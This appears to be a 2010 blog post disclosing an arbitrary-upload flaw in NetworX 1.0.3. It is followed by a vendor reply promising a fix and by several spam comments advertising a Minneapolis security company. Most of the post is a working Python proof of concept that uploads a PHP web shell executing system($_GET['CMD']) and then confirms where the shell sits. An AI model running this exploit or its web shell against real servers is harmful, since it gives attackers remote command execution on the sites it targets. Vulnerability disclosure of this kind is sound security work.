This site is soon to be deprecated by http://www.johnleitch.net

Monday, July 5, 2010

NetworX 1.03 Arbitrary Upload

An arbitrary upload vulnerability in NetworX 1.0.3 can be exploited to upload a PHP shell.

PoC
import sys, socket
host = 'localhost'
path = '/networx'
port = 80

def upload_shell():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)

s.send('POST ' + path + '/upload.php?logout=shell.php HTTP/1.1\r\n'
'Host: ' + host + '\r\n'
'Proxy-Connection: keep-alive\r\n'
'User-Agent: x\r\n'
'Content-Length: 193\r\n'
'Cache-Control: max-age=0\r\n'
'Origin: null\r\n'
'Content-Type: multipart/form-data; boundary=----x\r\n'
'Accept: text/html\r\n'
'Accept-Encoding: gzip,deflate,sdch\r\n'
'Accept-Language: en-US,en;q=0.8\r\n'
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n\r\n'
'------x\r\n'
'Content-Disposition: form-data; name="Filedata"; filename="shell.php"\r\n'
'Content-Type: application/octet-stream\r\n\r\n'
'<?php echo "<pre>" + system($_GET["CMD"]) + "</pre>"; ?>\r\n'
'------x--\r\n\r\n')

resp = s.recv(8192)

http_ok = 'HTTP/1.1 200 OK'

if http_ok not in resp[:len(http_ok)]:
print 'error uploading shell'
return
else: print 'shell uploaded'

shell_path = path + '/tmp/shell.php'

s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
'Host: ' + host + '\r\n\r\n')

if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found'
else: print 'shell located at http://' + host + shell_path

upload_shell()

6 comments:

  1. good post!
    thanks for the report.
    we have fixed this vulnerability in current release and are planning to release it in next release NetworX 1.0.4 tomorrow

    ReplyDelete
  2. Powerboat Coursesbest home security companies

    thanks for your offer code table. it is very useful to share with me!

    ReplyDelete
  3. St.Paul Minneapolis security provider installs, services, and monitors residential and commercial security systems.State of the art technology, with the best installers and monitoring the State of Minnesota has to offer.
    Lloyd Security Minneapolis Security provider,Commercial security systems,Edina Alarm,
    Home security companies MNMinneapolis Home Security Systems

    ReplyDelete
  4. State of the art technology, with the best installers and monitoring the State of Minnesota has to offer. Lloyd SecurityWireless Home Security Systems, Commercial security systems, No phone line security system, Minnetonka home security, Minneapolis Security provider
    Minneapolis Home Security Systems

    ReplyDelete